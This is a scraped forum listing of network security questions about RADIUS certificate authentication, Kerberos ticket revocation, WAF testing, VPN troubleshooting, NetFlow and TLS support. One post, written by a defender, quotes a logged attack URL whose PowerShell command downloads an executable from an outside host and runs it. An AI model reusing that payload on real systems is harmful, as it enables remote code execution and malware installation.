Network Security Help

Hi,

As far as I understand our current set-up:-

We have a WPA2 Enterprise wireless solution. The AP's act as Radius Clients and connecting devices use PEAP to connect valid domain users via RADIUS (currently running on Server 2012 R2) using their domain credentials.

There is a server-side certificate which I believe is used for encrypting the session.

I have been asked to move to a pure certificate based solution (i.e. certificate on both server and client and no more authentication necessary) and I am not sure how best to set this up. We have our own PKI.

Can anyone point me in the direction of any good quality information about how I would set RADIUS up to work in this way?

I have noticed an unchecked box in Radius that says "Disconnect Clients without Cryptobinding" but I can't find a lot of documentation about what that means and what checking it would change.

I have also noticed that we are using the Domain Users group to validate users, but imagine we could use Domain Computers instead. How secure would that be? Does the device actually do some authentication or could another device with the same name connect with that setting?

I've also seen a number of things indicating that MS-CHAP and MS-CHAP-V2 are essentially worthless. so how do I avoid using these?

If anyone can point me at any great documentation for setting something like this up in a more secure way, I would find that really helpful.

Not an expert in these areas, so any …

3 Comments

Rowby Goren Makes an Impact on Screen and Online

LVL 13

Learn about longtime user Rowby Goren and his great contributions to the site. We explore his method for posing questions that are likely to yield a solution, and take a look at how his career transformed from a Hollywood writer to a website entrepreneur.

I've noticed that all of my web servers were logging this block below from my host intrusion prevention system. For privacy, assume this particular webserver has a dns name of zeus.xyzcorp.com

zeus.xyzcorp.com/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/8.exe');start%20C:/8.exe

Is this bot just a crafted URL request being thrown at my webserver in hopes that it is vulnerable to run a powershell script that will make it reach out and download + execute something? Which exploit would this be targetting?

8 Comments

My employer wants the ability to disable an AD account and have assurance the end user's access to email and network resources is immediately or quickly revoked. We tested this earlier this morning and discovered although email access to Exchange is almost immediately unavailable, the end user still has access to critical and sensitive data through mapped drives. I've got the impression this is because the end user still has a kerberos ticket cached on their PC. What is the best practice to mitigate this risk? Should we modify the kerberos ticket lifetime on the 2012R2 Domain Controller, or some other method? Thanks!

6 Comments

LVL 4

Question by

Abraham Deutsch

2019-02-28Solved

recommendation on web control app

Our employees on the road have laptops with LTE connection and want to narrow their internet usage to only a few sites or category’s I came across this site https://www.currentware.com/browsecontrol/ which seems good but is pricy.

What I like about this site is they have a lot of categories to choose from, which others like windows parental control or NetNanny do not offer.

I would not go with Norton for example, since I don’t want their security firewall.

OpenDNS would be the one I would go, but in this case, it will not work, since you need to use their DNS and with LTE, you cannot change the DNS.

Any recommendations

5 Comments

I am building a lab in my apartment.

I'm a student. I have a ton of Linux servers but no Windows servers. So I have a few questions

1. I am a student. Do I need to pay by the core or do they have a free student license?
2. Which version of Windows server should I get?
3. Will this verison have a GUI? Should I use a GUI. Very comfortable with Unix shell. I would like to learn Powershell but also just want an overview of Windows server.
4. How do I connect to Windows server from a Linux machine?
5. I want to specialize in network security. What should my goals be running Windows server? What do I need to learn and get a good overview of?

-----
I have added a lot of tags and plan to keep this question open for a while, especiallly from the NetSec people.

4 Comments

I need tools / ways to test our new WAF (to be set up in UAT VLAN) for
a) Brute Force : what's the commands/syntax if I use Jack the Ripper or any other suggested tool?
b) DDoS volumetric & application
c) OWASP top 10 (eg: XSS, SQL injection, CSRF, Cross-Frame-Site-Forgery/Clickjacking, insecure file upload)
d) Rate-Limiting : can I use the command line browser 'wget' to load a page many times to simulate?
e) any other aspects to test?
f) virtual patching (eg: if a patch is not applied & the WAF has a rule/signature for Wordpress/PHP)

I don't have access to Kale Linux (but possibly an RHEL VM in UAT) to run Metasploit: hopefully there's
a Metasploit for RHEL (but do suggest how to use it to test)

16 Comments

Hi

When adding an IP to an outside interface on a Cisco ASA, what IP information do i need from my ISP

I believe its just an public IP address and subnet mask? Do I need a gateway address?

6 Comments

Hi

I need to allow access to a remote ip to be able to manage the config on my Cisco 5506. What's the best way?

Thanks

4 Comments

Over the last few weeks I've noticed our DNS filter blocking the same address many times and the address is similar to our domain which is a little concerning. I'm seeing blocked attempts to access mwear.mcdir.ru. From what I can tell that looks like a Russian hosting service. DNS Lookup shows the ip as 178.208.83.11 ran by Webazilla B.V. which from what I can find is in the Netherlands. We do have a techy Russian employee who was my first thought and after investigating he was using Yandex which is a Russian browser of some sort. I thought the issue was tied to Yandex which was installed on three different computers. I removed all instances and DNS filter logs were clean for a couple days. Before I went on leave I setup local DNS logging and when I returned I'm seeing alot of blocked attempts to the same source. I tried looking through logs on the Cisco firewall but I couldn't recreate the issue to help point me to the culprit. The firewall was reporting our DNS filter IP instead of the questionable IP when I try recreating the issue. Moving on to the DNS logs, I will attach a sample of the logs but i'm seeing this from multiple IP addresses on our network now. One computer I re-imaged right before my leave and another laptop that i'm pretty certain the user practices above average password and security policies. All of the computers on the network are running Kaspersky Endpoint. Any help would be much appreciated!

Notes about computer IPs shown in the logs.
…

6 Comments

I am setting up our infrastructure to enable remote phones on a new phone system we installed. The phone vendor requirements were fairly simple, port forward UDP 443 to a device on our DMZ(the virtual machine). Easy, or so I thought.

Everything looks good from the Firewall end. If I plug in the phone, I can see the traffic hit the firewall, and be forwarded to the device lets say is 11.11.11.11. No issues I can see from the firewall end. It's a Barracuda NG F280, I have gone over it over and over with Barracuda support and they see nothing from their end.

The issue is that traffic never hits 11.11.11.11. I have set up a monitoring VM on my DMZ with wireshark, never see the traffic. The VM has a packet monitor built in so I can create packet captures on the interface directly, never see the traffic. If I run a netcat cmd for UDP 443, I see nothing. I see other traffic. If I ping 11.11.11.11 from anywhere else on the network, I see it. There is nothing between this device and the Firewall, except the VMWare hypervisor.

I am at a loss at this point. My Firewall vendor says it isn't on their end, my phone vendor says it isn't on theirs. I believe that to be the truth, but I don't know what else it could be. Does anyone have any ideas? Only thing I can think of is something in VMWare, but I have never seen VMWare block traffic like that before.

Some more info:

Seems localized in some way to port number. If I change my forwarding rule to port 3300 instead…

9 Comments

One of the Big 4 consulting firm has strongly advocated 2FA to be used if
we are on O365 Exchange online as they had seen quite a few incidents
that could have been prevented if users of O365 uses 2FA.

Q1:
if secure email (eg: HP Voltage & one of those where users have to login
to a portal to retrieve the encrypted emails) are used, will this mitigate
such issues as serve as good replacement for 2FA ?

Q2:
Does O365 offers secure email feature or add-on (like HP's Voltage)?

3 Comments

I'm exploring if Rapid 7 can be used to track patch status (what patches are applied on which dates
& which ones have been released but yet to be applied) of our Solaris, RHEL 6/7 & Windows servers
as well as configuring it to do weekly scan of CIS hardenings (including for Cisco switches/routers).

Any document/materials on how to configure to check for patch status & CIS hardenings are
much appreciated.

6 Comments

Refer to attached:
need to clarify on the red-text items in the excel :
what are the usual industry-practice settings like
whether "occurs 10 times/minute" : is this the usual
setting or hackers usually will attempt 5 times/0.5min?

From our network IPS logs, have seen variations in
attempts (by blacklisted source IP addrs) in making
3-10 attemps over various time horizons.

Appreciate any comments/inputs on the red-text
items in the attached use cases which we're going
to adopt to finetune our SIEM/SOC
SiemSocUsecases.xlsx

6 Comments

Token Based Authentication and the .NET Stack

What can you tell me about the built-in capabilities of .NET Stack to use Token Based Authentication and also Token Based Authentication in general??

3 Comments

LVL 17

Question by

Tiras25

2019-02-07SolvedPrivate

Colortokens

Have anyone used Colortokens https://colortokens.com/
what do the do exactly and what do they do for data center and endpoint security?

3 Comments

HI, Looking for some advice on the best authentication method to use with Meraki for our environment. We are in Hybrid mode with O365 via ADFS, and shortly all mailboxes and data will be migrated to the cloud to allow staff to work from home etc. Users currently have on-prem AD joined laptops and PC's, but going forwards we are replacing up to 150 laptops and the current plan is to Azure AD join them instead of directly to the on-prem domain, and manage with Intune. We installed a new Meraki wireless network and configured a local NPS server as per Meraki instructions "Configuring RADIUS Authentication with WPA2-Enterprise" using Domain/Users Group, and I can connect to the corporate SSID using my AD credentials. However, we would like to lock down access to just corporate machines but the Azure AD joined machines do not show in the on-prem AD so cannot just use the domain/computers group. If we go down the local on-prem CA server certificate route , as I understand it we would have to first add this as a trusted authority on all the Azure joined laptops. I am leaning towards using a trusted CA authority cert from Go-Daddy - is this the best option for my scenario?

Cheers

5 Comments

LVL 9

Question by

the_b1ackfox

2019-02-05Solved

Microsoft AD and the retro information melt down

On two separate projects in two separate companies I have become aware of an issue where AD information from a long time ago, seems to revert back into AD. In case A, a DC had been removed several months prior, and then Bam! it looked like there references in AD to the "flying dutchman" AD server. In case b, the event seems to revolve around a switch reboot. In this case AD information from YEARS ago returned (We think the information coincides to the point when the systems were imaged and first brought into the domain (like 6 years ago)) I did note that one of the DC was not responding to dns queries via nslookup, and workstations on a specific subnet seemed to revert from DHCP subnet IP to a 169 address. Immediately after the event rebooting the workstations still left the system with the 169 addresses. The switches involved are Cisco switches and the subnet has an IP helper for the interface.

I don't have specifics on what happened, I am just trying to understand what causes an event like this.

4 Comments

Greetings! I have well over 15 years in the I.T. world specifically in working with Servers & Workstations, I am considering branching out to another field in the I.T. world specifically in the Cyber Security. I have minimal I.T. Security related experience and knowledge.
Q4U: What Cyber Security Certification would be ideal for a novice like me?
There are so many and I would like to focus on the one that will open the doors to that side of the I.T. world.
Thank you in advance!

6 Comments

A vendor offers a mobile app for tracking vehicles & this app links back to their server in Azure cloud.
We install this app on our corporate mobile devices. We have
a) iPhone 5 on IOS 10.x
b) certain iPad models on IOS 9.x
c) Android phones on Android 4.4

Q1:
Vendor told us they can't enforce TLS1.2 on their app as they have other customer (also in transport
related industry) with mobile devices still using Android 4.x, thus they'll to still permit TLS1.0 & 1.1.
Is this enforcement of TLS version something that's done at the server end (in the cloud) or at the
mobile app side?

The vendor currently supports only 1 version of the mobile app, thus they can't customize this app
specifically for us just to enforce certain TLS version as advised by them.
Q2:
What's the highest version of TLS (1.2, 1.1 or 1.0) that IOS 9.x and Android 4.4 could support?

Q3:
Anyone know if mobile apps can be made to go for TLS 1.2 first, failing which, it'll fall back to
1.1 & if this fails, then 1.0 ? If it can be done, is this at server or client end?

Q4:
Suppose there's a load balancer (eg: F5 or A10) at the server end, does the cert installed at
the loadbalancer matters where TLS version support is concerned?

7 Comments

Active Protection takes the fight to cryptojacking

LVL 2

While there were several headline-grabbing ransomware attacks during in 2017, another big threat started appearing at the same time that didn’t get the same coverage – illicit cryptomining.

just as in ssllabs qualys to scan for ssl weaknesses, is there free tools for xss, cross-frame-scriptg, injections etc?

for scanning portals and mobile apps

10 Comments

Hi All,

I am using XTM 25/26 Watchguard firewall in the company and many of the remote users are connected through Mobile SSL VPN. Everything was working fine with no issues and last after internet connectivity break down and restoration no one can able to login using Mobile SSL VPN.

I have checked everything but couldn't understand the issue. Can anyone help me with this?

Few points :

1. Firewall OS is not upgraded
2. No new rules is created
3. Reinstall SSL Client software, Create new user with new password. Can login to Webpage of SSL (https://Firewall IP/sslvpn.html) and able to download fresh software. De-activate and Re-activate Mobile SSL VPN.
4. Internal Network 192.168.1.0/24, Virtual address pool 192.168.111.0/24

Here is the diagnosis report.

2019-01-23 10:43:32 sslvpn sslvpn_event, add entry, entry->virtual_ip=0.0.0.0, entry->real_ip=192.168.1.88, dropin_mode=0
2019-01-23 10:43:32 sslvpn Mobile VPN with SSL user Mitul logged in. Virtual IP address is 0.0.0.0. Real IP address is 192.168.1.88.
2019-01-23 10:43:35 sslvpn Entered in sslvpn_takeaddr
2019-01-23 10:43:35 sslvpn Arguments which needs to be sent:openvpn_add 0 1548200615 0
2019-01-23 10:43:35 sslvpn Going to open wgipc:
2019-01-23 10:43:35 sslvpn assign ip address, rip=c0a86f02, lip=0, common_name=0
2019-01-23 10:43:35 sslvpn Sending Data by wgipc to sslvpn_takeaddr is Success,Buffer:192.168.111.2:0.0.0.0:0
2019-01-23 10:43:35 sslvpn Success,Sending Data to …

12 Comments

I have multiple VLAN one for servers, one for workstations, and so on. Towards the end of the year users started NOT being able to load PDF files off a server on the server vlan (user on the workstation vlan). The way users access the file is by way of an icon on their core application (financial core system) that allows them to search for a variety of documents. The user is able to reach the portal by way of the method just mentioned and if they are looking for a PDF - they get a message (not always) saying that the file is corrupted or unable to load.

If I log onto the server and attempt to load files (PDFs) - No issue. No to bore you with a long story, the last test I conducted was to move a workstation to the server vlan. Boom, things are working again. I had a vendor we work with, check on our network but nothing was found to be blocking anything as far as they can tell. This server is running SQL, IIS and another test I conducted was to place a PDF on the www folder to attempt to access the PDF this way, it works on the 2nd try. On the first try I close the browser and re-open it, go to the PDF using http:\\serverIP\PDFname and boom it load, no problem. Only after the 2nd attempt. If anyone has any ideas of what I could do to resolve this issue, would be greatly appreciated. Thanks all!

4 Comments

a colleague said we can enable Netflow (to send its Netflow data to SIEM) on Cisco Layer 2 switches
but the link below seems to say otherwise:
https://support.solarwinds.com/Success_Center/Netflow_Traffic_Analyzer_(NTA)/Knowledgebase_Articles/Enable_Netflow_on_Cisco_VLAN_interfaces_to_show_layer_2_and_3_traffic

So which is correct & we just need to have a VLAN to be present in L2 switches??

A security requirement pops up requiring Netflow to be monitored centrally &
to review "information flow" : guess we can say that if we're monitoring it
centrally, we're reviewing it

12 Comments

Regulator recommended to turn on Netflow: guess this was obtained from
CIS' Critical Security Controls V6.1 for effective Cyber defense, item 12.9 :
Deploy NetFlow collection and analysis to DMZ network flows to detect anomalous activity

However, my network colleague's understanding is Netflow can only be turned on for
Layer 3 interfaces

Q1:
Is this true or L2 Cisco switches can also enable Netflow? If so, can share a link on
how this is done?

Q2:
One pair of routers belong to Telco (not ours) which is beyond our jurisdiction so we're
leaving this out.
However, can Gaia firewall enable Netflow equiv (aka Source Data, Flow Cache)?
Links below seems to indicate so or I read it wrongly?
Seems like Gaia has it:
https://www.cpug.org/forums/showthread.php/21480-Checkpoint-and-Netflow-collector :

“can configure Gaia OS as an Exporter of NetFlow records for all the traffic that is accelerated by SecureXL (SecureXL must be enabled for NetFlow to operate properly) …“

To enable SecureXL:
https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk41397
[Expert@HostName]# fwaccel on

Q3:
Juniper firewall has JFlow but we plan to tech refresh our Gaia to Fortinet: does Forti
has equiv of Netflow?

3 Comments

I'd like some design input regarding how best to peel off (and secure) traffic from a carrier network interface device (NID) providing both Internet and MPLS connectivity over a single pipe.

The carrier is providing a single circuit carrying both Internet and private data (MPLS backend) via different VLAN tags (let's say Internet=X, MPLS=Y) to a carrier-managed NID. There will be a pair of firewalls to handle the Internet traffic, so a pair of switches will be in front of them. Here's an overall simplified version of the scenario:

Single circuit providing Internet and MPLS

We’ll obviously extend the VLAN X from the switches to the firewalls, but I’m trying to determine the best way to handle the VLAN Y private traffic. I’ve recently seen a design where the customer had this external switch with a separate couple connections for the private VLAN directly to the core environment (so, bypassing the firewalls). Obviously, this is not wise, as these switches have a public IP, and compromise for them would provide access to the core directly.

So, the two options would seem to be 1) also trunk data VLAN (Y) over the same connection to the firewall, and then use them somehow to provide a layer of security/abstraction from the outside world, or 2) implement another layer of something off of these switches to do the same.

How are others handling enterprise Internet/WAN when these services are delivered over a single circuit?

I’m not afraid of reading, so reference links/resources would …

10 Comments

Network Security

Related Topics

Network Security

Related Topics